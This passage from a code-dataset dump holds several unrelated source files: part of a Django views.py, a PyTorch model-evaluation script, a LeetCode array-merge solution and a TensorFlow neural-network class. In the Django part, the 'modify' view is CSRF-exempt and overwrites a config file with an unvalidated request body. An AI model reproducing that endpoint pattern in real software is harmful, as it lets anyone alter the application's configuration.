value_split[d][2]\n dicList_display['location'] = value_split[d][3]\n #dicList_display['type'] = value_split[d][3] + value_split[d][4]\n dicList_display['type'] = value_split[d][4]\n dicList_display['content'] = value_split[d][5]\n dicList_list.append(dicList_display)\n d = d + 1\n\n search_result['data'] = dicList_list\n search_result['number'] = searchErrorCounter\n \n \n #将列表转化成字典\n #print(search_display)\n \n return JsonResponse(search_result)\n #AJax响应List数据\n #return HttpResponse(json.dumps(search_display), content_type='application/json')\n\n\n#读取配置文件\n\ndef readconf (request):\n\n \n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\conf\\config.json')\n \n #with open(file_path,\"r\") as f:\n #temp = json.dumps(f.read())\n f = file(file_path)\n temp = json.load(f)\n return render(request, 'readconf.html',{'data':temp})\n\ndef modifyconf(request):\n\n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\conf\\config.json')\n \n #with open(file_path,\"r\") as f:\n #temp = json.dumps(f.read())\n f = file(file_path)\n temp = json.load(f)\n return render(request, 'modifyconf.html',{'data':temp})\n\n@csrf_exempt\n\ndef modify (request):\n\n data = json.loads(request.body)\n #data1 = json.loads(request.body.decode())\n #data = request.POST.get(\"samba\")\n #data2 = request.POST.get(\"expire\")\n #expire = json.loads(request.POST.['expire'])\n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\conf\\config.json')\n \n print(data)\n with open(file_path,\"w\") as f:\n json.dump(data,f)\n\n return HttpResponse('修改成功!');","sub_path":"Single_data_upload_alarm_system/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"78559036","text":"# This script loads test data and a trained pytorch model. 
itthe makes the following plots:\n\n# - LOSS OF EACH SAMPLE\n# - RELATIVE ERROR AND ERROR FOR EACH AXIS OVER TIME\n# - P_PRED AND P_TRUTH FOR SINGLE SAMPLE\n\n# In the end an estimated p value with a random target is simulated to get a y and\n# compared to the simulated y of the p retreived from trajectory optimization.\n\n##########################################\n#LOAD LIBRARIES\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport time\nimport matplotlib.pyplot as plt\nimport json\nimport pydde as d\nimport os\n\n########################################\n#PARAMETERS\ntime_length = 60 #seconds\nhiddenlayers = [100]\nsamples_per_file = 1000\ndata_file_path = '../Data/Samples/data_20k_2x2x2/test_data/'\ncriterion = nn.SmoothL1Loss() # Huber Loss\nmodel_file_path = '../Trained_Models/Model_latest.pt'\nmodel_statedict_file_path = '../Trained_Models/state_dict/Model_statedict_latest.pt'\n\n#########################################\n#LOAD SAMPLES\nnumber_of_files = len(os.listdir(data_file_path))\nnumber_of_samples = samples_per_file*number_of_files\np = np.zeros((3*time_length, number_of_samples))\ny_target = np.zeros((number_of_samples, 3))\ngradnorm_truth = np.zeros(number_of_samples)\niterations_truth = np.zeros(number_of_samples)\nloss_truth = np.zeros(number_of_samples)\n\nfor filenum in range(number_of_files):\n with open(data_file_path + f'data_{filenum}.json') as json_file:\n data = json.load(json_file)\n filesize = len(data['y_target'])\n for i, p_i in enumerate(data['parameter']):\n p[:, filenum*filesize+i] = np.array(p_i)\n for s, y_s in enumerate(data['y_target']):\n y_target[filenum*filesize+s, :] = np.array(y_s)\n for i, truth in enumerate(data['loss']):\n loss_truth[filenum*filesize+i] = np.array(truth)\n for i, truth in enumerate(data['iterations']):\n iterations_truth[filenum*filesize+i] = np.array(truth)\n for i, truth in enumerate(data['loss']):\n gradnorm_truth[filenum*filesize+i] = np.array(truth)\np = p.transpose()\nprint(f'Shape of y_target: {y_target.shape}')\nprint(f'Shape of p: {p.shape}')\n\ny_test = torch.tensor(y_target).float()\np_test = torch.tensor(p).float()\n\n#########################################\n#LOAD MODEL\nclass PassiveLearn(nn.Module):\n\n def __init__(self, n_in, out_sz):\n super(PassiveLearn, self).__init__()\n\n self.L_in = nn.Linear(n_in, hiddenlayers[0])\n self.H1 = nn.Linear(hiddenlayers[0], 3*time_length)\n self.L_out = nn.Linear(3*time_length, 3*time_length)\n self.Relu = nn.ReLU(inplace=True)\n self.drop = nn.Dropout(p=0.5)\n \n def forward(self, input):\n x = self.L_in(input)\n x = self.Relu(x)\n x = self.H1(x)\n x = self.Relu(x)\n x = self.L_out(x)\n return x\n\nmodel = PassiveLearn(3, 180)\nmodel.load_state_dict(torch.load(model_statedict_file_path))\n#model = torch.load(model_file_path)\n\n#########################################\n#TEST THE DATA\nlosses_test= []\nwith torch.no_grad():\n for i in range(number_of_samples):\n p_val = model(y_test[i, :])\n loss = criterion(p_val,p_test[i,:])\n losses_test.append(loss.clone().numpy())#Test the data\n\n#########################################\n#PLOT LOSS OF EACH SAMPLE\nplt.figure(figsize = [12,6])\nloss_test = plt.plot(losses_test, label = 'loss')\nplt.legend()\nplt.ylabel('error')\nplt.xlabel('sample')\nplt.show()\ntot_error = sum(losses_test)\nprint(tot_error)\n\n#########################################\n#CALCULATE RELATIVE AND ABSOLUTE ERROR OF EACH AXIS\nrel_errors_norm = []\nwith torch.no_grad():\n for i in range(number_of_samples):\n p_val = model(y_test[i, :])\n p_truth 
= p_test[i,:]\n rel_error = np.linalg.norm((p_val - p_truth)/p_truth)\n rel_errors_norm.append(rel_error)\n\nrel_errors_sum = torch.zeros(180)\nabs_errors_sum = torch.zeros(180)\nwith torch.no_grad():\n for i in range(number_of_samples):\n p_val = model(y_test[i, :])\n p_truth = p_test[i,:]\n rel_error = (p_val - p_truth)/p_truth\n abs_error = np.abs(p_val - p_truth)\n rel_errors_sum = rel_errors_sum + rel_error\n abs_errors_sum = abs_errors_sum + abs_error\nx_err_rel = rel_errors_sum[0::3]/(number_of_samples)\ny_err_rel = rel_errors_sum[1::3]/(number_of_samples)\nz_err_rel = rel_errors_sum[2::3]/(number_of_samples)\n\nx_err = abs_errors_sum[0::3]/(number_of_samples)\ny_err = abs_errors_sum[1::3]/(number_of_samples)\nz_err = abs_errors_sum[2::3]/(number_of_samples)\n\n#########################################\n#PLOT RELATIVE ERROR AND ERROR FOR EACH AXIS OVER TIME\nplt.figure(figsize = [10,10])\n#plt.suptitle('Errors using 5000 samples', fontsize=16)\n\nplt.subplot(2, 1, 2)\nplt.plot(x_err_rel, label = 'x-axis')\nplt.plot(y_err_rel, label = 'y-axis')\nplt.plot(z_err_rel, label = 'z-axis')\nplt.xlabel('time (ms)')\nplt.title('relative error of each axis over time')\nplt.legend()\n\nplt.subplot(2, 1, 1)\nplt.plot(x_err, label = 'x-axis')\nplt.plot(y_err, label = 'y-axis')\nplt.plot(z_err, label = 'z-axis')\nplt.xlabel('time (ms)')\nplt.title('mean absolute error of each axis over time')\nplt.legend()\nplt.show()\n\n#############################################\n#PLOT P_PRED AND P_TRUTH FOR SINGLE SAMPLE\nrandomsample = 9\nwith torch.no_grad():\n p_val = model(y_test[randomsample, :])\n p_truth = p_test[randomsample,:]\n x_val = p_val[0::3]\n y_val = p_val[1::3]\n z_val = p_val[2::3]\n x_truth = p_truth[0::3]\n y_truth = p_truth[1::3]\n z_truth = p_truth[2::3]\n \n\nplt.figure(figsize = [12,6])\nplt.plot(x_val, label = 'x-axis')\nplt.plot(y_val, label = 'y-axis')\nplt.plot(z_val, label = 'z-axis')\nplt.plot(x_truth, '--', label = 'true x-axis')\nplt.plot(y_truth, '--', label = 'true y-axis')\nplt.plot(z_truth, '--', label = 'true z-axis')\nplt.title('p_pred and p_truth for a single sample')\nplt.xlabel('timestep')\nplt.legend()\nplt.show()\n\n#####################################################\n#TEST THE MODEL\n\n# Generate simulation\ndyn = d.PyDyn('../Data/point-mass_pendulum.sim', time_length)\nstate_init = dyn.compute(dyn.p_init)\nf = dyn.f(state_init, dyn.p_init)\ndf = dyn.df_dp(state_init, dyn.p_init)\ndy = dyn.dy_dp(state_init, dyn.p_init)\n\ny_target_test_= torch.tensor([0.5, 1.5, 0.5])\np_ = model(y_target_test_)\ny_target_ = y_target_test_.detach().numpy()\np_ = p_.detach().numpy()\np_truth_ = dyn.get_p(y_target_, dyn.p_init)\n\nyTraj_test_ = dyn.compute(p_)\nyTraj_truth_ = dyn.compute(p_truth_)\n\nprint('TEST OF THE MODEL')\nprint(f'\\ntest for y_target:\\n {y_target_test_}')\nprint(f'\\nevaluated y_end:\\n {yTraj_test_.y[-3:]}')\nprint(f'\\nsimulated traj_opt y_end with p_truth:\\n {yTraj_truth_.y[-3:]}')\nprint(f'\\ndifference of y_end:\\n {np.sum(yTraj_test_.y[-3:]-y_target_)}')\nprint(f'\\nlast 6 entries of p predicted:\\n {p_[-6:].transpose()}')\nprint(f'\\nlast 6 entries of p from traj_opt:\\n {p_truth_[-6:].transpose()}')","sub_path":"Python_Files/ML_Evaluation_and_Plots.py","file_name":"ML_Evaluation_and_Plots.py","file_ext":"py","file_size_in_byte":7000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"571107779","text":"class Solution(object):\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n :type nums1: 
List[int]\n        :type m: int\n        :type nums2: List[int]\n        :type n: int\n        :rtype: void Do not return anything, modify nums1 in-place instead.\n        \"\"\"\n        # drop the n placeholder slots at the end of nums1, then merge nums2 in and sort in place\n        del nums1[m:]\n        for i in nums2:\n            nums1.append(i)\n        nums1.sort()\n","sub_path":"merge_sorted_array.py","file_name":"merge_sorted_array.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"248202033","text":"from __future__ import print_function\n\nimport os\nimport time\n\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nfrom DataPrep import random_batch_generator, fast_random_batch_generator\n\n# from plotroutines import draw_triangle_cont\ndef selu(x, name):\n    alpha = 1.6732632423543772848170429916717\n    scale = 1.0507009873554804934193349852946\n    return tf.multiply(scale,tf.where(x>=0.0, x, alpha*tf.nn.elu(x)), name=name)\n    \ndef get_optimizer(optimizer):\n    if optimizer == \"Adam\":\n        return tf.train.AdamOptimizer\n    elif optimizer == \"Adagrad\":\n        return tf.train.AdagradOptimizer\n    elif optimizer == \"Adadelta\":\n        return tf.train.AdadeltaOptimizer\n    elif optimizer == \"Momentum\":\n        return tf.train.MomentumOptimizer\n    elif optimizer == \"GradientDescent\":\n        return tf.train.GradientDescentOptimizer\n    else:\n        raise ValueError(\"'{0}' not a valid optimizer\".format(optimizer))\n\nclass NeuralNet(object):\n\n\n    @staticmethod\n    def _get_layers(h, l, n):\n        \"\"\"\n        Determine the dimensions of all layers n with given input size h and output size l\n        including the visible in- and output layers\n        0 layers return just one hidden layer which maps from input to output\n        1 layer has one intermediate layer of size in between in- and output ...\n        \"\"\"\n        return [h - int((i)*(h-l)*1./(n+1)) for i in range(n+2)]\n\n    @staticmethod\n    def _get_activation(activation=None):\n        if activation == \"sigmoid\":\n            return tf.nn.sigmoid\n        elif activation == \"relu\":\n            return tf.nn.relu\n        elif activation == \"softsign\":\n            return tf.nn.softsign\n        elif activation == \"tanh\":\n            return tf.nn.tanh\n        elif activation == \"linear\" or activation == \"lin\" or activation is None:\n            return tf.identity\n        elif activation == \"elu\":\n            return tf.nn.elu\n        elif activation == \"selu\":\n            return selu\n        elif activation == \"lrelu\":\n            return tf.nn.leaky_relu\n        elif activation == \"softmax\":\n            return tf.nn.softmax\n        else:\n            print(\"Error: Unknown activation '%s'\" % activation)\n            exit(-1)\n    \n    loss_log = []\n    save = False\n    nLayer = None\n\n    def _get_number(self, last=False):\n        nn = 1\n        while os.path.isdir(\"tmp/summary_\"+self.flag_name+(\"_%d\" % nn)):\n            nn += 1\n        if last:\n            return nn - 1\n        else:\n            return nn\n    \n    def _fully_connected_stack(self, x, vname, layers, activation_fn,\n                               factor_weights, mode_weights, uniform_weights, factor_bias, mode_bias, uniform_bias,\n                               aname=\"act\", norm=\"None\"):\n        \"\"\"\n        Args:\n            x: tensor, input\n            vname: string, namespace for the variables, variables are named: \"name_w3\" or \"name_b1\" starting with 0\n            layers: array, not including input size\n            activation_fn: list of tensorflow functions. 
Is applied to each layer, excluding the input, including output\n factor, mode, uniform: float, 'FAN_AVG'/'FAN_IN'/'FAN_OUT', see tf doc., bool (default xavier_initialization)\n aname: string, namespace for the activation functions, names will be: \"act_0\", \"act_1\", ...\n norm: \"None\", \"Layer\"\n Returns:\n a: tensor, the activation of the last layer\n \"\"\"\n x_shape = x.shape[1]\n i = 0\n a = x\n \n for i, layer in enumerate(layers):\n\n l_ = x_shape if i == 0 else layers[i-1] # previous size, shape for the weights\n\n w = tf.get_variable(\"%s_w%d\"%(vname,i), shape=[l_, layer], initializer=tf.contrib.layers.variance_scaling_initializer(factor=factor_weights, mode=mode_weights, uniform=uniform_weights))\n b = tf.get_variable(\"%s_b%d\"%(vname,i), shape=[layer], initializer=tf.contrib.layers.variance_scaling_initializer(factor=factor_bias, mode=mode_bias, uniform=uniform_bias))\n \n if activation_fn[i] is not None:\n a = tf.matmul(a, w)\n \n if norm == \"Layer\":\n a = tf.contrib.layers.layer_norm(a)\n\n a = tf.add(a, b)\n a = activation_fn[i](a, name=\"%s_a%d\"%(aname,i))\n else:\n a = tf.add(tf.matmul(a, w), b, name=\"%s_a%d\"%(aname,i))\n if self.tensorboard:\n tf.summary.histogram(\"hist_activation_%d\"%i, a)\n # opname = \"%s_a%d\"%(aname,i)\n # if not opname in [op.name for op in tf.get_default_graph().get_operations()]:\n # print(\"Did not find {0} in OperationCollection, adding manually ...\".format(opname))\n # tf.get_default_graph()._add_op(a)\n \n return a\n \n def __del__(self):\n try:\n if self.save:\n save_path = self.saver.save(self.sess, self.save_path)\n print(\"Saved neural net in: %s\" % save_path)\n tf.reset_default_graph()\n except Exception:\n pass\n \n def __init__(self, import_dir=None, nInput=None, nOutput=None, nOutput_binary=0, layers=None,\n estimate_uncertainty=False, norm=\"None\",\n uniform_bias=False, uniform_weights=False, factor_weights=1, factor_bias=1, mode_weights='FAN_AVG', mode_bias='FAN_AVG',\n optimizer=\"Adam\", learning_rate=.1, momentum=.1,\n activations=\"tanh\", lastLayer=\"linear\", objective=None, convert_to_onehot=False,\n load=False, number=None, dtype=\"float\", tensorboard=True):\n \"\"\"\n Args:\n nInput: int, number of input dimension of the data\n nOutput: int, number of output dimension of the data\n nOutput_binary: int, number of trailing (!) output dimensions that are binary. Should not exceed nOutput.\n layers: array, excluding input and output neurons, i.e. [6] a network with nInput input neurons, one\n hidden layer with 6 neurons, one output layer 6->nOutput\n norm: additional normalization; \"None\", \"Layer\"\n uniform_bias/weights: bool, initialization of bias and weights\n optimizer: string, \"GradientDescent\", \"Adam\", \"Adagrad\", \"Adadelta\", \"Momentum\"\n learning_rate, momentum: float\n activations: string, activation function f(w*x+b) to be used: \"relu\", \"selu\", \"sigmoid\", \"tanh\", \"softsign\", \"linear\"\n lastLayer: string, activations for the last layer, specify like activations or \"softmax\"\n objective: string, the objective which is to be minimized, specify from: \"L2\", \"CrossEntropy\", default:\n CrossEntropy for lastLayer=\"softmax\"\n L2 otherwise\n convert_to_onehot: bool, if True, convert the target input to one_hot vector. Input has shape [batch_size,]\n now (default=False). 
The depth (number of labels to use for one_hot encoding) is given by nDim_low,\n or layers[-1]\n load: bool\n number: int, number of the network, if None is given, it is automatically assigned\n \"\"\"\n \n if import_dir is not None:\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n \n self.sess = tf.Session(config=config)\n self.sess.as_default()\n tf.saved_model.loader.load(self.sess, [\"main\"], import_dir)\n \n try:\n self.layers = self.sess.run(\"layers:0\")\n self.nLayer = self.sess.run(\"nLayer:0\")\n except ValueError:\n print(\"Warning: Using deprecated model with new NN version. Model might not be able to use 'layers' variable\")\n \n \n self.init = tf.global_variables_initializer()\n else:\n if dtype==\"float\":\n dtype = tf.float32\n else:\n dtype = tf.float64\n \n if not os.path.isdir(\"out\"):\n os.makedirs(\"out\")\n # if not os.path.isdir(\"out/vid\"):\n # os.makedirs(\"out/vid\")\n if tensorboard and not os.path.isdir(\"tmp\"):\n os.makedirs(\"tmp\")\n\n self.tensorboard = tensorboard\n\n if layers is None:\n layers = []\n else:\n layers = list(layers)\n self.layers = layers\n allLayers = [nInput] + self.layers + [nOutput]\n self.nLayer = len(layers)\n \n tf.constant(self.layers, dtype=tf.int32, name=\"layers\")\n tf.constant(self.nLayer, name=\"nLayer\")\n self.flag_name = (\"NN\" + \"_%d\"*len(allLayers)) % tuple(allLayers)\n self.save_path = \"out/\"+self.flag_name+\".ckpt\"\n print(\"Neural Net network layers (inclusive in/- and output): \", end=\"\")\n print(allLayers, end=\"; No. of parameters: \")\n print(np.sum(np.array(allLayers[:-1])*np.array(allLayers[1:])))\n\n # last layer activation and objective function\n if lastLayer == \"softmax\" and (objective is None or objective == \"CrossEntropy\"):\n self.objective = \"softmax_cross_entropy_with_logits\"\n self.lastLayer = \"softmax\"\n elif lastLayer == \"sigmoid\" and objective == \"CrossEntropy\":\n self.objective = \"sigmoid_cross_entropy_with_logits\"\n self.lastLayer = \"sigmoid\"\n elif objective is None or objective == \"L2\":\n self.objective = \"L2\"\n self.lastLayer = lastLayer\n elif objective == \"CrossEntropy\":\n raise ValueError(\"Using Cross Entropy loss function without a softmax/sigmoid layer (Not implemented, Sorry, but you are weird).\")\n else:\n raise ValueError(\"Trying to build the network, but objective or last layer activation function is invalid (%s, %s)\" % (objective, lastLayer) )\n\n # neural net: input\n x = tf.placeholder(dtype, shape=[None,nInput], name='x')\n if not convert_to_onehot:\n y = tf.placeholder(dtype, shape=[None,nOutput], name='y')\n yy = y\n else:\n y = tf.placeholder(tf.int32, shape=[None], name='y')\n yy = tf.one_hot(y, nOutput, name=\"yy\")\n yy_real = yy[:,:nOutput - nOutput_binary]\n yy_bina = yy[:,nOutput - nOutput_binary:]\n \n # neural net\n thelayers = layers + [2*nOutput - nOutput_binary] if estimate_uncertainty else layers + [nOutput]\n theactivations = [self._get_activation(activations) for _ in self.layers] + [tf.identity]\n logits_all = self._fully_connected_stack(x, \"nn\", thelayers, theactivations,\n factor_weights, mode_weights, uniform_weights, factor_bias, mode_bias, uniform_bias, norm=norm)\n \n # sigma for the reals\n if estimate_uncertainty:\n epsilon = -10 # regularizes sigma to a minimum of log\\sigma > espilon\n y_sigmaLogits = epsilon + tf.nn.relu(logits_all[:,nOutput:] - epsilon)\n y_sigma = tf.exp(y_sigmaLogits, name=\"sigma\")\n \n logits = logits_all[:,:nOutput]\n else:\n logits = logits_all\n \n last_activation = 
self._get_activation(self.lastLayer)\n # real and binary part\n logits_real = logits[:,:nOutput - nOutput_binary]\n logits_bina = logits[:,nOutput - nOutput_binary:]\n # activations\n y_real = last_activation(logits_real)\n y_bina = tf.nn.sigmoid(logits_bina)\n y_hat = tf.concat([y_real, y_bina], axis=1, name=\"y_hat\")\n\n # error functions and loss\n if self.objective == \"softmax_cross_entropy_with_logits\":\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=yy, logits=logits), name='loss')\n elif self.objective == \"sigmoid_cross_entropy_with_logits\":\n loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=yy, logits=logits), name='loss')\n else:\n # without sigma\n error_single_sample = tf.concat([0.5*tf.square(yy_real - y_real),\n tf.nn.sigmoid_cross_entropy_with_logits(logits=y_bina, labels=yy_bina)], axis=1, name=\"error_single_sample\")\n error_sample = tf.reduce_sum(error_single_sample, axis=1, name=\"error_sample\")\n error = tf.reduce_mean(error_sample, name=\"error\")\n # with sigma\n if estimate_uncertainty:\n likelihood_sample = tf.add(tf.reduce_sum(0.5*tf.square(tf.divide(\n y_real - yy_real, y_sigma)) + y_sigmaLogits, axis=1),\n tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=y_bina, labels=yy_bina), axis=1), name=\"likelihood_sample\")\n likelihood = tf.reduce_mean(likelihood_sample, name=\"likelihood\")\n else:\n likelihood_sample = tf.identity(error_sample, name=\"likelihood_sample\")\n likelihood = tf.identity(error, name=\"likelihood\")\n \n loss = tf.identity(likelihood, name=\"loss\")\n\n # optimizer\n optimizer_fun = get_optimizer(optimizer)\n optimizer = optimizer_fun(learning_rate)\n\n # train step\n d_train = optimizer.minimize(loss, name=\"dtrain\")\n\n # Session and initialization\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n\n self.sess = tf.Session(config=config)\n self.sess.as_default()\n self.init = tf.global_variables_initializer()\n\n \n # Tensorboard\n if tensorboard:\n for p in range(len(layers)+1):\n # Variable summaries\n # tf.summary.histogram(\"nn_w%d\" % p, \"nn_w%d\" % p)\n # tf.summary.histogram(\"nn_n%d\" % p, \"nn_w%n\" % p)\n\n # Activation summaries\n # below doesnt always work for some reason, added op when creating the activation op instead\n # tf.summary.histogram(\"hist_activation_%d\"%p, self.sess.graph.get_tensor_by_name(\"act_a%d:0\"%p))\n pass\n\n # self.loss_feed_valid = tf.placeholder(tf.float32, [None], name=\"loss_feed_valid\")\n loss_feed_train = tf.placeholder(dtype, [None], name=\"loss_feed_train\")\n # tf.summary.scalar(\"loss_valid\", tf.reduce_mean(self.loss_feed_valid))\n tf.summary.scalar(\"loss_train\", tf.reduce_mean(loss_feed_train))\n tf.summary.scalar(\"loss_valid\", loss)\n if estimate_uncertainty:\n tf.summary.scalar(\"l2_error\", error)\n\n merged = tf.summary.merge_all()\n if number is None and load:\n self.number = self._get_number(last=False)\n elif number is None:\n self.number = self._get_number()\n twriter_path = os.path.join(os.getcwd(), \"tmp\", \"summary_\" + self.flag_name + (\"_%d\" % self.number))\n self.test_writer = tf.summary.FileWriter(twriter_path, self.sess.graph)\n print(\"To use tensorboard, type:\")\n print(\"tensorboard --logdir='\" + twriter_path + \"'\")\n\n # Save and Load\n self.saver = tf.train.Saver()\n if load:\n self.saver.restore(self.sess, self.save_path)\n else:\n self.sess.run(self.init)\n\n def _validate(self, test_data, i, print_console=True, train_loss=0.):\n\n if not test_data is None:\n x_, y_ = 
test_data\n \n summary, error, loss = self.sess.run([\"Merge/MergeSummary:0\", \"error:0\", \"loss:0\"], feed_dict={\"x:0\": x_, \"y:0\": y_, \"loss_feed_train:0\": [train_loss]})\n\n self.test_writer.add_summary(summary, i)\n self.loss_log.append([i, loss])\n\n if print_console:\n print(\"%d: error=%.4g; loss=%.4g; Train=%.4g\" % (i, error, loss, train_loss))\n else:\n summary = self.sess.run(\"loss_train:0\", feed_dict={\"loss_feed_train:0\": [train_loss]})\n self.test_writer.add_summary(summary, i)\n self.loss_log.append([i, train_loss])\n if print_console:\n print(\"%d: Train=%.5g\" % (i, train_loss))\n\n def train(self, nTrain, batch_gen, test_data=None, save=False, test_step=500, print_step=500, count_tests=False):\n \"\"\"\n param:\n nTrain: int, number of train steps\n batch_gen: generator object which yields: x and y for the network [x,y]\n test_data: array of test data [x,y]\n save: bool (default=False)\n test_step: int, test every test_step steps (default=500)\n print_step: int, print every print_step steps if data has been tested\n count_tests: bool, For printing and tensorboard. The step given is either the test number (True) or train_step number (False)\n :return int, number of training steps\n \"\"\"\n\n self.save = save\n t0 = time.time()\n self.loss_log = list(self.loss_log)\n\n if self.objective == \"softmax_cross_entropy_with_logits\":\n print(\"Minimizing cross entropy. Purely random, fair, expected CE: %.4g\"%np.log(self.nDim_out))\n elif self.objective == \"sigmoid_cross_entropy_with_logits\":\n print(\"Minimizing cross entropy. Purely random, fair, expected CE: %.4g\"%np.log(2))\n\n step = 0\n while step < nTrain:\n\n x_, y_ = next(batch_gen)\n tloss, _ = self.sess.run([\"loss:0\", \"dtrain\"], feed_dict={\"x:0\": x_, \"y:0\": y_})\n \n if step % test_step == 0:\n tx = step/test_step if count_tests else step\n self._validate(test_data, tx, (step % print_step == 0), train_loss=tloss)\n step += 1\n\n self.loss_log = np.array(self.loss_log)\n\n if save:\n save_path = self.saver.save(self.sess, self.save_path)\n\n print(\"Training time: %.3f\" % (time.time() - t0))\n return step\n \n def fit(self, X, y=None, *args, **kwargs):\n test_data = kwargs.pop(\"test_data\", None)\n batch_size = kwargs.pop(\"batch_size\", 128)\n nTrain = kwargs.pop(\"nTrain\", 10000)\n future = kwargs.pop(\"future\", 0)\n \n y = X if y is None else y\n nInput = self.sess.graph.get_tensor_by_name(\"x:0\").shape[1]._value\n nOutput = self.sess.graph.get_tensor_by_name(\"y:0\").shape[1]._value\n \n look_back = nInput//X.shape[1]\n sum_back = nOutput//y.shape[1]\n\n if look_back == sum_back == future + 1 == 1:\n batch_gen_train = fast_random_batch_generator(X, y, batch_size)\n else:\n batch_gen_train = random_batch_generator(X, y, batch_size, look_back, sum_back, future, 1, 1, 1)\n if test_data is not None:\n batch_gen_test = random_batch_generator(test_data[0], test_data[1], -1, look_back, sum_back, future, shuffle=0)\n test_data = next(batch_gen_test)\n \n self.train(nTrain, batch_gen_train, test_data, *args, **kwargs)\n return self\n\n def _batch_process_x(self, tensor, x, batch_size=-1, y=None):\n if (batch_size is None) or (batch_size < 0) or (batch_size > len(x)):\n batch_size = len(x)\n if isinstance(tensor, list):\n N = len(tensor)\n else:\n N = 0\n\n if N == 0:\n result = []\n else:\n result = [[] for _ in range(N)]\n i = 0\n while True:\n high = i + batch_size if i + batch_size < len(x) else len(x)\n feed_dict={\"x:0\": x[i:high]} if (y is None) else {\"x:0\": x[i:high], \"y:0\": y}\n tmp = 
self.sess.run(tensor, feed_dict)\n if N == 0:\n result.append(tmp)\n else:\n for t in range(N):\n result[t].append(tmp[t])\n\n i += batch_size\n if high == len(x):\n break\n if N == 0:\n return np.concatenate(result, axis=0)\n else:\n return [np.concatenate(result_, axis=0) for result_ in result]\n\n def process_data(self, data, batch_size=None):\n \"\"\"\n Returns:\n Throughput of the network, shape=[N,nDim_out]\n \"\"\"\n return self._batch_process_x(\"y_hat:0\", data, batch_size)\n \n def process_data_loss(self, data, targets):\n \"\"\"\n Returns:\n Throughput of the network, shape=[N,nDim_out]\n loss function, shape=[]\n \"\"\"\n return self.sess.run([\"y_hat:0\", \"loss:0\"], feed_dict={\"x:0\": data, \"y:0\": targets})\n\n def reduce_process_data(self, layer_x, data, batch_size=None):\n \"\"\"\n Args:\n layer_x: layer number of which the activations are processed\n Returns:\n layer_x activations, shape=[N,layers[x+1]]\n Throughput of the network, shape=[N,nDim_out]\n \"\"\"\n return self._batch_process_x([\"act_a%d:0\"%layer_x, \"y_hat:0\"], data, batch_size)\n \n def process(self, tensors, datax, datay=None):\n \"\"\"\n Process different kind of tensors by name, possibilities given below\n :param tensors: str or list from: [\"y\", \"sigma\", \"error\", \"error_single\", \"likelihood\", \"loss\"]\n :param datax:\n :param datay:\n :return:\n \"\"\"\n if type(tensors) is str:\n tensors_ = [tensors]\n else:\n tensors_ = tensors\n \n if len(datax.shape) == 1:\n datax = np.reshape(datax, [1,-1])\n elif len(datax.shape) > 2:\n raise ValueError(\"Invalid shape of data input, found: %s\"%str(datax.shape))\n \n tensorNames = {\n \"y\": \"y_hat:0\",\n \"sigma\": \"sigma:0\",\n \"error\": \"error_sample:0\",\n \"error_single\": \"error_single_sample:0\",\n \"likelihood\": \"likelihood_sample:0\",\n \"loss\": \"loss:0\",\n }\n \n tensors_ = [tensorNames[tensors__] for tensors__ in tensors_]\n if datay is None:\n feed_dict = {\"x:0\": datax}\n else:\n feed_dict = {\"x:0\": datax, \"y:0\": datay}\n result = self.sess.run(tensors_, feed_dict=feed_dict)\n \n if type(tensors) is str:\n return result[0]\n else:\n return result\n\n def predict(self, X, estimate_uncertainty=False):\n \"\"\"\n Predict with the neural net. 
If n_feature != nInput, look_back is inferred.\n :param X: numpy array, shape is [n_sample, n_feature]\n :return y: numpy array, output predictions\n \"\"\"\n nInput = self.sess.graph.get_tensor_by_name(\"x:0\").shape[1]._value\n look_back = nInput//X.shape[1]\n\n if not (look_back == 1):\n batch_gen = random_batch_generator(X, None, -1, look_back, 0, 0, shuffle=0)\n datax, _ = next(batch_gen)\n else:\n datax = X\n \n tensors = ['y', 'sigma'] if estimate_uncertainty else 'y'\n ret = self.process(tensors, datax)\n return ret\n \n # def dream_input(self, output):\n # # output = tf.constant(output)\n # dream_input = tf.get_variable(\"dream_input\", shape=[self.nDim_in], dtype=tf.float32, initializer=tf.contrib.layers.zeros_initializer)\n # dream_output = tf.placeholder(tf.float32, shape=[self.nDim_out])\n\n # with tf.variable_scope(\"trainable\") as scope:\n # scope.reuse_variables()\n\n # if len(self.nLayers) > 2:\n # a = self._fully_connected_stack(dream_input, \"nn\", self.nLayers[1:-1], self._get_activation(self.activationN))\n # else:\n # a = dream_input\n\n # # Add a last layer\n # w = tf.get_variable('nn_w%d' % (len(self.nLayers) - 2))\n # b = tf.get_variable('nn_b%d' % (len(self.nLayers) - 2))\n\n # # logits and activations\n # logits = tf.add(tf.matmul(a, w), b)\n # loss = tf.reduce_mean(tf.square(dream_output - self.activations))\n\n def save_loss_log(self, plot=True):\n # return 0\n np.save(\"out/losses_\"+self.flag_name + (\"_%d\" % self.number) + \".npy\", self.loss_log)\n\n if plot:\n # LOGPLOTS\n plt.close(\"all\")\n #plt.plot(self.loss_log[:][0], self.loss_log[:][1], color=\"red\")\n plt.semilogy(self.loss_log[:,0], self.loss_log[:,1], color=\"red\")\n axes = plt.gca()\n axes.set_ylim([np.amin(self.loss_log[:,1]),1.5*np.mean(self.loss_log[:,1])])\n plt.xlabel(\"step\")\n plt.ylabel(\"l2_loss\")\n plt.savefig(\"out/l2_loss_log_\" + self.flag_name + (\"_%d\" % self.number) + \".png\")\n\n if False:\n plt.close(\"all\")\n plt.semilogy(self.loss_log[:,0], self.loss_log[:,2], color=\"blue\")\n axes = plt.gca()\n 